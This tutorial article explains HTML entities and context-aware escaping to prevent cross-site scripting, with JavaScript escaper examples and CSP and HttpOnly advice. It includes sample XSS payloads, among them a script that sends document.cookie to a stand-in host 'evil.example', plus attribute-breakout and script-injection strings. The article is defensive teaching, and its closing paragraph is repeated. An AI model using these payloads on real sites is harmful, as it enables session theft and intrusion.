Most rendering bugs and a large share of web security holes come down to one question: was this text treated as data, or as markup? HTML escaping is how you answer that question consistently, and getting it right is the difference between a clean page and a cross-site scripting (XSS) hole.

What an HTML entity actually is

An HTML entity is a way to represent a character using a sequence of plain ASCII text so the browser doesn't interpret it as part of the markup language. Entities come in two forms:

  • Named entities like `&lt;`, `&gt;`, `&amp;`, and `&quot;`. Each maps to a specific character.
  • Numeric character references like `&#60;` (decimal) or `&#x3C;` (hexadecimal), both of which produce `<`.

When the browser's parser encounters `&lt;`, it renders a literal less-than sign on the page instead of starting a tag. That single substitution is the entire mechanism behind both correct display and a major class of injection defense.
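
As a rough illustration of the two numeric forms, the sketch below builds the decimal and hexadecimal references for a character from its code point. The helper name `numericReferences` is made up for this example.

```javascript
// Hypothetical helper: build both numeric character references for one character.
function numericReferences(ch) {
  const codePoint = ch.codePointAt(0); // Unicode code point of the first character
  return {
    decimal: `&#${codePoint};`,
    hex: `&#x${codePoint.toString(16).toUpperCase()};`,
  };
}

console.log(numericReferences('<')); // { decimal: '&#60;', hex: '&#x3C;' }
console.log(numericReferences('&')); // { decimal: '&#38;', hex: '&#x26;' }
```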

The characters that matter

The browser decides what is markup and what is text using a small set of special characters. These are the ones you must be able to neutralize:

| Character | Why it's dangerous | Entity |
|-----------|--------------------|--------|
| `<` | Opens a tag | `&lt;` |
| `>` | Closes a tag | `&gt;` |
| `&` | Starts an entity reference | `&amp;` |
| `"` | Terminates a double-quoted attribute | `&quot;` |
| `'` | Terminates a single-quoted attribute | `&#39;` or `&apos;` |

The ampersand is the one people forget. If you escape `<` to `&lt;` but leave a raw `&` alone, then content like `Tom & Jerry &lt;b&gt;` can produce ambiguous or double-decoded output: the browser decodes the `&lt;b&gt;` the user typed literally and displays `<b>` instead. When you escape with a chain of replacements, always escape `&` first, before anything else, so you never re-escape the ampersands you just introduced.
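
To make the ordering issue concrete, here is a small sketch that compares the two orders on the same input. Both function names are invented for the comparison, and only `&` and `<` are handled to keep it short.

```javascript
// Wrong order: "<" is escaped first, then the "&" in the fresh "&lt;" is escaped again.
function escapeWrongOrder(s) {
  return s.replace(/</g, '&lt;').replace(/&/g, '&amp;');
}

// Right order: "&" first, so later replacements never revisit their own output.
function escapeRightOrder(s) {
  return s.replace(/&/g, '&amp;').replace(/</g, '&lt;');
}

const sample = 'Tom & Jerry <b>';
console.log(escapeWrongOrder(sample)); // Tom &amp; Jerry &amp;lt;b>
console.log(escapeRightOrder(sample)); // Tom &amp; Jerry &lt;b>
```

With the wrong order, the reader would see the literal text `&lt;b>` on the page rather than `<b>`.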

Why you escape: the two failure modes

There are two distinct reasons to escape, and conflating them leads to sloppy fixes.

Broken markup

If a user types a product review that says `cost<benefit, would buy again`, and you drop that string straight into your HTML, the browser sees `<` followed by a letter and starts parsing a tag. The rest of your paragraph may vanish, the layout may collapse, or the page may swallow content until it finds a stray `>`. (A `<` followed by a space or a digit, as in `3 < 5`, is tolerated by HTML parsers and rendered as text, which is why this bug often survives casual testing.) This is a correctness bug, not necessarily a security one, but it is the same root cause.

Cross-site scripting (XSS)

Now imagine the user types this instead:

html
<script>fetch('https://evil.example/steal?c='+document.cookie)</script>

If that lands unescaped in your page, the browser executes it. The attacker's JavaScript now runs in your origin, with access to your users' session cookies, local storage, and the full DOM. Escaping `<` to `&lt;` turns that payload into harmless visible text: the browser displays the characters and never runs them.

XSS is not exotic. It is almost always plain text that wasn't escaped before being concatenated into HTML.

Context-aware escaping

The single most important idea in this article: escaping depends on where the data lands. "HTML-escape everything" is a good default but an incomplete rule, because HTML has several sub-languages, each with its own special characters.

HTML text content

Between tags, like `<p>HERE</p>`, you need to handle `<`, `>`, and `&`. This is the most common case and the one most libraries default to.

html
<p>3 &lt; 5 &amp; rising</p>

HTML attributes

Inside an attribute you also have to escape the quote character that delimits the attribute, or the value can break out:

html
<!-- Dangerous: value breaks out of the quotes -->
<input value=""><script>alert(1)</script>">

<!-- Safe: quote is escaped -->
<input value="&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;">

Always quote your attributes. An unquoted attribute can be ended by a space, making it far harder to escape safely.
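
A minimal sketch of attribute-context escaping might look like the following. The names `escapeAttr` and `renderInput` are hypothetical, and the helper assumes the attribute is always written with quotes around it.

```javascript
// Characters that must not reach a quoted attribute value unescaped.
const ATTR_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;',
};

// Single-pass replacement, so there is no ordering concern for "&".
function escapeAttr(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ATTR_ESCAPES[ch]);
}

// Hypothetical render helper; the attribute is always wrapped in double quotes.
function renderInput(value) {
  return `<input value="${escapeAttr(value)}">`;
}

console.log(renderInput('"><script>alert(1)</script>'));
// <input value="&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;">
```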

JavaScript and CSS contexts

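HTML escaping does not protect data placed inside a `<script>` block or in CSS such as a `style` attribute. The parser does not decode entities inside `<script>` at all, and although it does decode them in a `style` attribute, the decoded value is then interpreted as CSS, which has its own syntax. If you put user data into JavaScript, the right tool is JSON encoding or JavaScript string escaping, not `&lt;`. A frequent mistake: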

html
<script>
  // HTML-escaping here does nothing useful and can break the JS
  var name = "USER_INPUT";
</script>

If `USER_INPUT` contains `";attackerCode();//`, you have script injection even though there's not a single `<` involved. The fix is to serialize the value as JSON (`JSON.stringify`, with `<` additionally escaped so that a `</script>` inside the value cannot end the block) and, ideally, to avoid generating inline script from untrusted data at all.
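
One way to sketch that serialization step is shown below. `serializeForScript` is a name invented here, and the value is assumed to be JSON-serializable. The extra replacements exist because `JSON.stringify` on its own leaves `<` untouched, so a `</script>` inside the data could still close the block.

```javascript
// Sketch: serialize a value for embedding inside an inline <script> block.
// JSON.stringify handles quotes and backslashes; the replacements below keep
// "<", ">", "&" and the U+2028/U+2029 separators out of the emitted source.
function serializeForScript(value) {
  return JSON.stringify(value)
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

const userInput = '";attackerCode();//</script>';
const inlineScript = `<script>var name = ${serializeForScript(userInput)};</script>`;
console.log(inlineScript);
// <script>var name = "\";attackerCode();//\u003c/script\u003e";</script>
```

The escaped form is still valid JavaScript and JSON: parsing it yields the original string, but the HTML parser never sees a closing tag inside the data.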

URLs

A value placed in an `href` or `src` needs URL encoding, plus a scheme check. HTML-escaping a URL does nothing to stop `javascript:alert(1)` from running when clicked. Validate that the scheme is `http`, `https`, or `mailto` before trusting it.
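
The scheme check can be sketched with the standard `URL` parser, as below. The names `isSafeUrl` and `buildSearchLink` and the `example.com` address are assumptions for illustration. This version deliberately rejects relative URLs, which a real application may want to allow.

```javascript
const ALLOWED_SCHEMES = new Set(['http:', 'https:', 'mailto:']);

// Sketch: accept only absolute URLs whose scheme is on the allowlist.
// Anything the URL parser rejects (including relative URLs) counts as unsafe here.
function isSafeUrl(input) {
  try {
    const url = new URL(String(input));
    return ALLOWED_SCHEMES.has(url.protocol); // protocol is lowercased and ends with ":"
  } catch {
    return false;
  }
}

// Untrusted values that go into a query string still need URL encoding.
function buildSearchLink(query) {
  return `https://example.com/search?q=${encodeURIComponent(query)}`;
}

console.log(isSafeUrl('https://example.com/page')); // true
console.log(isSafeUrl('JaVaScRiPt:alert(1)'));      // false
console.log(buildSearchLink('a&b=c'));              // https://example.com/search?q=a%26b%3Dc
```

Checking the parsed `protocol` instead of searching the raw string for "javascript" is what makes the mixed-case variant fail the check.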

The takeaway: pick the escaping function that matches the destination context. The same piece of user input may need a different treatment depending on whether it lands in text, an attribute, a script string, or a URL.

Named vs numeric entities

For the security-critical characters, named and numeric entities are interchangeable in effect:

  • `&lt;`, `&#60;`, and `&#x3C;` all render `<`.
  • `&amp;` and `&#38;` both render `&`.

Practical guidance:

  • Named entities are more readable for the common set (`&lt;`, `&gt;`, `&amp;`, `&quot;`). Prefer them in hand-written markup.
  • Numeric references are universal. Any Unicode code point can be written as `&#NNNN;` or `&#xHHHH;`, which matters for characters that have no named entity.
  • `&apos;` is risky in old contexts. It is valid in HTML5 and XML but was not defined in HTML 4, and it historically failed in older browsers and some email rendering paths. When escaping single quotes defensively, `&#39;` is the safer choice.

A defensive escaper that emits numeric references for the dangerous set is a perfectly reasonable design, and it sidesteps the `&apos;` compatibility wrinkle entirely.
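
Such a numeric-only escaper could be sketched like this. `escapeHtmlNumeric` is an illustrative name, not an existing library function.

```javascript
// Sketch: escape the dangerous set with decimal numeric references in one pass.
// A single pass also means there is no ordering problem with "&".
function escapeHtmlNumeric(s) {
  return String(s).replace(/[&<>"']/g, (ch) => `&#${ch.charCodeAt(0)};`);
}

console.log(escapeHtmlNumeric(`<a title='Tom & "Jerry"'>`));
// &#60;a title=&#39;Tom &#38; &#34;Jerry&#34;&#39;&#62;
```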

If you want to inspect exactly what a given snippet decodes to, or convert a block of text to its escaped form, our HTML entity encoder and decoder does the round-trip and runs entirely in your browser, so nothing you paste leaves your device.

Common mistakes

Escaping on input instead of output

A recurring anti-pattern is to escape data the moment it arrives and store the escaped version in the database. This breaks the moment the same data is used in a non-HTML context: an email, a JSON API, a CSV export, or a PDF. You end up with `&amp;` showing up in plain-text emails. Store raw, escape at output, where you know the exact destination context.
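
As a sketch of "store raw, escape at output", the snippet below keeps one raw value and encodes it separately for each destination. The variable names and the sample review are invented for the example.

```javascript
// Minimal HTML escaper for this sketch (text and quoted-attribute contexts only).
function escapeForHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (ch) => map[ch]);
}

// The stored value stays raw; each output path applies its own encoding.
const storedReview = 'Fish & chips <3';

const asHtml = `<p>${escapeForHtml(storedReview)}</p>`;
const asJson = JSON.stringify({ review: storedReview });
const asEmailText = `New review: ${storedReview}`;

console.log(asHtml);      // <p>Fish &amp; chips &lt;3</p>
console.log(asJson);      // {"review":"Fish & chips <3"}
console.log(asEmailText); // New review: Fish & chips <3
```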

Double escaping

If you escape a value twice, `&` becomes `&amp;`, which becomes `&amp;amp;`, and users see literal `&amp;` on the page. This usually happens when a template engine auto-escapes and your code also escapes manually. Know whether your framework escapes by default (most modern ones do for interpolated values) and don't stack a second pass on top.
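
The effect is easy to reproduce. In this sketch the second call stands in for a template engine's automatic pass, and `escapeOnce` is a hypothetical name.

```javascript
// One escaping pass over the structural characters.
function escapeOnce(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (ch) => map[ch]);
}

const manual = escapeOnce('Tom & Jerry'); // your code escapes by hand
const rendered = escapeOnce(manual);      // the template engine escapes again

console.log(manual);   // Tom &amp; Jerry
console.log(rendered); // Tom &amp;amp; Jerry
```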

Trusting a blocklist of "dangerous" strings

Blocklisting `<script>` or stripping the word "javascript" is not escaping and does not work. Attackers use `<img src=x onerror=...>`, SVG event handlers, mixed-case `JaVaScRiPt:`, and dozens of other vectors. Encode the structural characters; don't try to outguess every payload.

Forgetting the attribute quote

Escaping `<` and `>` but not the quote character leaves attribute-context injection wide open, as shown above. If your data goes in an attribute, the delimiter quote is non-negotiable.

Marking strings as "safe" to silence the framework

Every templating system has an escape hatch (`dangerouslySetInnerHTML`, `|safe`, `v-html`, `mark_safe`). Each one disables the auto-escaping that was protecting you. Reserve these for HTML you generated yourself and never for anything derived from user input without sanitization.

A minimal correct escaper

For HTML text and double-quoted attribute contexts, this small function covers the dangerous set in the correct order:

javascript
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;') // must be first
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

This is deliberately small. It is correct for text and attribute output, and it is not a substitute for JSON encoding in script contexts or URL encoding in `href` values. Real applications should lean on their framework's context-aware auto-escaping rather than hand-rolling this everywhere; the snippet exists to show that the core mechanism is simple and to make the ordering explicit.
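
To hint at how a framework applies an escaper like this automatically, here is a sketch of a tagged template that escapes every interpolated value. The `html` tag is hypothetical, and `escapeHtml` is repeated only so the snippet runs on its own.

```javascript
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;') // must be first
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Hypothetical tag: literal template parts pass through, interpolated values are escaped.
function html(strings, ...values) {
  return strings.reduce(
    (out, part, i) => out + part + (i < values.length ? escapeHtml(values[i]) : ''),
    ''
  );
}

const comment = "<script>fetch('https://evil.example/steal?c='+document.cookie)</script>";
console.log(html`<p>${comment}</p>`);
// <p>&lt;script&gt;fetch(&#39;https://evil.example/steal?c=&#39;+document.cookie)&lt;/script&gt;</p>
```

This only covers text and quoted-attribute positions; a value interpolated into a script block or a URL would still need the treatment for that context.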

Layers beyond escaping

Escaping is the primary defense, but pair it with a couple of cheap reinforcements:

  • A Content-Security-Policy that disallows inline scripts turns many would-be XSS payloads into nothing, even if an escape slips.
  • HttpOnly cookies keep session tokens out of reach of any script that does execute.

Neither replaces escaping; both reduce the blast radius when something gets through.
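
As a sketch of what those two reinforcements look like on the wire, the function below returns a pair of response headers. The function name, the cookie name `session`, and the exact policy string are assumptions for illustration and not a recommendation for every site.

```javascript
// Sketch: response headers for a strict script policy and an HttpOnly session cookie.
function securityHeaders(sessionToken) {
  return {
    // No 'unsafe-inline' here, so inline <script> blocks and inline event handlers are refused.
    'Content-Security-Policy': "default-src 'self'; script-src 'self'",
    // HttpOnly hides the cookie from document.cookie; Secure and SameSite are common companions.
    'Set-Cookie': `session=${encodeURIComponent(sessionToken)}; HttpOnly; Secure; SameSite=Lax; Path=/`,
  };
}

console.log(securityHeaders('abc123'));
```

With Node's built-in `http` module, an object like this can be passed as the headers argument of `res.writeHead(200, ...)`.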

Seeing it in practice

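The fastest way to build intuition is to watch escaped and unescaped markup render side by side. Paste a snippet with raw `<` and `&` into our live HTML preview and then escape it to see how the same string flips from broken or executable to inert, readable text. If you only remember one rule from this article, make it this: decide what context the data lands in, escape for that context at the moment of output, and never trust a string to escape itself.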
into our live HTML preview and then escape it to see how the same string flips from broken or executable to inert, readable text. If you only remember one rule from this article, make it this: decide what context the data lands in, escape for that context at the moment of output, and never trust a string to escape itself.